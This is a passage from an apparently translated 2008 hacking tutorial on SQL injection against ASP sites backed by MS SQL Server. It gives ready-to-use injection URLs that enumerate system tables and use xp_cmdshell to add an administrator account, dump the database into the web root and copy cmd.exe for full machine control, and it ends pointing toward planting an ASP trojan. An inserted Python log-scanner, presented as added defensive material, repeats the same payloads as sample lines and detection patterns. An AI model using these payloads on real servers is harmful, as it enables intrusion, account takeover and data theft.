Hackers teach you what a SQL injection attack is (4)
  Add date: 07/16/2008   Publishing date: 07/16/2008   Hits: 13
Using: select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 lists all user-created tables in the database ChouYFD.

syscolumns: every column of every table and view occupies one row in this table, and every parameter of a stored procedure also occupies one row. This table exists in every database. Its main fields are:

name, id, colid: the column name, the table ID and the column ID respectively; the id here is the table ID obtained from sysobjects above.
Using: select * from ChouYFD.dbo.syscolumns where id=123456789 obtains the list of all columns of the table whose ID is 123456789 in the database ChouYFD.

Third, determine whether xp_cmdshell can be executed
If the account used for the current database connection has SA privileges, and the extended stored procedure master.dbo.xp_cmdshell (calling it runs commands directly in the operating system shell; on SQL Server 2005 and later it is disabled by default and must first be enabled through sp_configure) executes correctly, then the whole machine can be fully controlled by the following methods, and all of the later steps can be skipped:
1. HTTP://xxx.xxx.xxx/abc.asp? p=YY&nb… er>0 abc.asp raises an error, but the error message reveals the user of the current database connection (if it shows dbo, the connection is SA).
2. HTTP://xxx.xxx.xxx/abc.asp? p=YY… me()>0 abc.asp raises an error, but the error message reveals the name of the database the connection is using.
3. HTTP://xxx.xxx.xxx/abc.asp? p=YY; exec master..xp_cmdshell "net user aaa bbb /add"-- directly adds the operating system account aaa with password bbb. (master is the main SQL Server database; the semicolon means SQL Server executes the statement before the semicolon and then goes on to execute the statement after it; "--" is a comment marker, so everything after it is treated as a comment and is not executed.)
4. HTTP://xxx.xxx.xxx/abc.asp? p=YY; exec master..xp_cmdshell "net localgroup administrators aaa /add"-- adds the account aaa just created to the administrators group.
5. HTTP://xxx.xxx.xxx/abc.asp? p=YY; backup database database to disk='c:\inetpub\wwwroot\save.db' writes a full backup of the database's contents into the web directory, from which the file is then downloaded over HTTP (of course, the web virtual directory must be known first).
6. Create a UNICODE vulnerability by copying CMD:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; exe… dbo.xp_cmdshell "copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe" creates a UNICODE vulnerability; using it in the usual way then gives control of the entire machine (of course, the web virtual directory must be known first).
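The following Python script is an added example, not code from the original article. It shows the defender's side of the procedure above: it takes web-server access-log lines, percent-decodes and normalizes the request URI (the trailing "--" comment and inline "/**/" comments are stripped so the injected statement is visible), and classifies each request into the stages this page describes, from the error-based user/db_name probes and the sysobjects/syscolumns enumeration queries to the stacked xp_cmdshell, backup-to-webroot and copy-cmd.exe commands. The log lines, the "client method uri status" layout and the placeholder host, page and parameter (abc.asp, p=YY, ChouYFD) are constructed for this example.

```python
"""Classify MS SQL Server injection payloads from access-log lines (added example)."""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines in a simplified "client method uri status" layout.
# Only the request URI is inspected; the other fields are carried through.
SAMPLE_LOG = (
    "10.0.0.5 GET /abc.asp?p=YY 200\n"
    "10.0.0.5 GET /abc.asp?p=YY%20and%20user%3E0 500\n"
    "10.0.0.5 GET /abc.asp?p=YY%20and%20db_name()%3E0 500\n"
    "10.0.0.5 GET /abc.asp?p=YY%20and%20(select%20count(*)%20from%20ChouYFD.dbo.sysobjects"
    "%20where%20xtype='U')%3E0 500\n"
    "10.0.0.5 GET /abc.asp?p=YY;exec%20master..xp_cmdshell%20'net%20user%20aaa%20bbb%20/add'-- 200\n"
    "10.0.0.5 GET /abc.asp?p=YY;exec%20master.dbo.xp_cmdshell%20'net%20localgroup%20administrators"
    "%20aaa%20/add'-- 200\n"
    "10.0.0.5 GET /abc.asp?p=YY;backup%20database%20ChouYFD%20to%20disk='c:\\inetpub\\wwwroot\\save.db'-- 200\n"
    "10.0.0.5 GET /abc.asp?p=YY;exec%20master..xp_cmdshell%20'copy%20c:\\winnt\\system32\\cmd.exe"
    "%20c:\\inetpub\\scripts\\cmd.exe'-- 200\n"
    # Mixed case, encoded quotes and an inline /**/ comment used as whitespace.
    "10.0.0.5 GET /abc.asp?p=YY;EXEC%20master..XP_CMDSHELL%20%27net%20user%27%2F%2A%2A%2F-- 200\n"
)

# Stages from the article, most severe first; the first matching pattern wins.
# Patterns run against the normalized query string (decoded, lower-cased, comments removed).
STAGES = [
    ("cmd.exe copied into a web script dir",
     re.compile(r"xp_cmdshell.*\bcopy\b.*cmd\.exe.*(scripts|wwwroot)")),
    ("local admin group modification",
     re.compile(r"xp_cmdshell.*net localgroup administrators")),
    ("os account creation",
     re.compile(r"xp_cmdshell.*net user \S+ \S+ /add")),
    ("xp_cmdshell stacked query",
     # master..xp_cmdshell, master.dbo.xp_cmdshell and master. .xp_cmdshell all match
     re.compile(r";\s*exec\s+master\s*\.\s*(dbo)?\s*\.\s*xp_cmdshell")),
    ("database backup to web root",
     re.compile(r";\s*backup database .* to disk\s*=")),
    ("system catalog enumeration",
     re.compile(r"\b(sysobjects|syscolumns)\b")),
    ("error-based probe (user / db_name)",
     re.compile(r"\band\s+(user|db_name\(\))\s*>\s*0")),
]


def normalize(query: str) -> str:
    """Decode twice (catches double encoding), lower-case, replace inline /* */
    comments with a space, drop the trailing -- comment and collapse whitespace."""
    s = unquote_plus(unquote_plus(query)).lower()
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"--.*$", "", s)  # the trailing comment is what hides the rest of the original query
    return re.sub(r"\s+", " ", s).strip()


def classify(uri: str):
    """Return the stage name for a request URI, or None when nothing matches."""
    norm = normalize(uri.partition("?")[2])
    for stage, pattern in STAGES:
        if pattern.search(norm):
            return stage
    return None


def scan_log(text: str):
    """Return (client, uri, stage) for every log line whose URI matches a stage."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed line: skip rather than crash the scan
        client, _method, uri, _status = parts[:4]
        stage = classify(uri)
        if stage is not None:
            hits.append((client, uri, stage))
    return hits


if __name__ == "__main__":
    for client, uri, stage in scan_log(SAMPLE_LOG):
        print(f"{client}  {stage:38s}  {normalize(uri.partition('?')[2])}")
```

The stage order matters: a request that both calls xp_cmdshell and runs "net localgroup administrators" is reported as the more severe group change, not as a generic stacked query. Normalizing before matching is what makes the patterns hold up against the encoding and comment tricks a scanner would otherwise miss; the patterns themselves are only the payloads this page describes, so treat the list as a starting point rather than a complete signature set.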
   
 
Fourth, discover the web virtual directory
Only after the web virtual directory has been found can the place to put the ASP trojan be determined, and from there USER-level privileges obtained. Two methods are fairly effective.

 